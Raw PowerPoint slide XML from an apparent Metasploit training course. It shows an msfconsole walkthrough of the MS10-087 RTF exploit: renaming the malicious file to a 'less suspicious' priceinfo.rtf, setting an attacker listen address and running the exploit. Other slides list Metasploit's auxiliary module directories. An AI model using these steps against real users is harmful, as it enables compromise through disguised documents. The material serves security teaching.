              <a:rPr lang="en-US" sz="1100" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>EXITFUNC process yes Exit technique:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>LHOST yes The listen address</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>LPORT 4444 yes The listen port</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Exploit target:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Id Name</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-- ----</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0 Automatic</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:br>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>The exploit contains a parameter </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>FILENAME </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>which contains information about the</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>malicious filename to be created. The default value is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>msf.rtf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>. Let us change it to</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>some less suspicious name. We will also set the value for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>LHOST </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>which is the attacking</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>machine IP address.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> exploit(ms10_087_rtf_pfragments_bof) &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>set FILENAME priceinfo.rtf</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>FILENAME =&gt; priceinfo.rtf</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:br>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> exploit(ms10_087_rtf_pfragments_bof) &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>set LHOST 192.168.1.1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>exploit(ms10_087_rtf_pfragments_bof) &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" b="1" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>exploit</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" b="1" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ar-EG" sz="1100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1473362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3695343" y="10239"/>
            <a:ext cx="4801314" cy="1261884"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="1">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Chapter 9</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="pt-BR" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>            M E T A S P L O I T 		</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="pt-BR" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>A U X I L I A R Y  M O D U L E S</a:t>
            </a:r>
            <a:endParaRPr lang="ar-EG" sz="2400" b="1"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6CCAF2FD-8AE6-DC33-CDA1-6B48550D9CFA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="87369" y="1087457"/>
            <a:ext cx="2465740" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="1">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Metasploit’s Directory </a:t>
            </a:r>
            <a:endParaRPr lang="ar-EG" sz="2000" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7896EA36-5B57-A7C5-F067-D897F53FAF75}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1136759" y="1403511"/>
            <a:ext cx="2832699" cy="292388"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="1">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cd /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/share/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-framework </a:t>
            </a:r>
            <a:endParaRPr lang="ar-EG" sz="1300" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{202EB18F-2159-DBA6-E5AB-F9BB93C77BF9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1840083"/>
            <a:ext cx="2839239" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="1">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Metasploit’s Auxiliary Modules</a:t>
            </a:r>
            <a:endParaRPr lang="ar-EG" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7" descr="A screenshot of a computer">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DBEAE2F8-6535-07B1-3E2E-FBC951BB0316}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6096000" y="1287512"/>
            <a:ext cx="5514920" cy="1538286"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 1880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CFCC38A3-E3CA-98F3-F02A-7A5CF75FE28B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="87369" y="2524927"/>
            <a:ext cx="6014137" cy="4247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TextBox 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2CBA7510-DDD1-275B-4CE7-5775281DEAA9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="87369" y="2524926"/>
            <a:ext cx="6375215" cy="4247317"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>m3lomat@kali: /opt/framework3/msf3/modules/auxiliary# ls total 52</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>drwxr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>xr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-x 23 root </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 4096 Apr 10 03:22 admin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>drwxr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>xr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-x 4 root </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 4096 Dec 14 03:25 client</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>drwxr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>xr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-x 16 root </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 4096 Jan 1 04:19 dos</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>drwxr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>xr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-x 8 root </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 4096 Dec 14 03:25 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>fuzzers</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>drwxr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>xr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-x 3 root </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 4096 May 2 15:38 gather</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>drwxr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>xr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-x 4 root </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 4096 Dec 14 03:25 pdf</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>drwxr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>xr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-x 36 root </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 4096 Apr 10 03:22 scanner</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>drwxr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>xr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-x 5 root </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 4096 May 2 15:38 server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>drwxr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>xr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-x 3 root </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 4096 May 2 15:38 sniffer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>drwxr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>xr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-x 5 root </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 4096 Dec 14 03:25 spoof</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>drwxr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>xr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-x 4 root </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 4096 Dec 14 03:25 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sqli</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>drwxr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>xr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-x 3 root </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 4096 May 2 15:38 test</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>drwxr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>xr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-x 3 root </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 4096 May 2 15:38 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>voip</a:t>
            </a:r>
            <a:endParaRPr lang="ar-EG" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1322037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F29060-7634-E27B-B62A-66AF120527D8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="357282" y="1402698"/>
            <a:ext cx="10832411" cy="996759"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2B745C9E-41EA-7929-BEE2-53EADE93093B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="557072" y="1531745"/>
            <a:ext cx="10632621" cy="938719"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="1">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="da-DK" sz="1400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>root@bt:/opt/framework3/msf3# </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1400" b="1" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>cd modules/auxiliary/admin/</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="da-DK" sz="1400" b="1" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="da-DK" sz="1400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>root@bt:/opt/framework3/msf3/modules/auxiliary/admin# </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1400" b="1" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
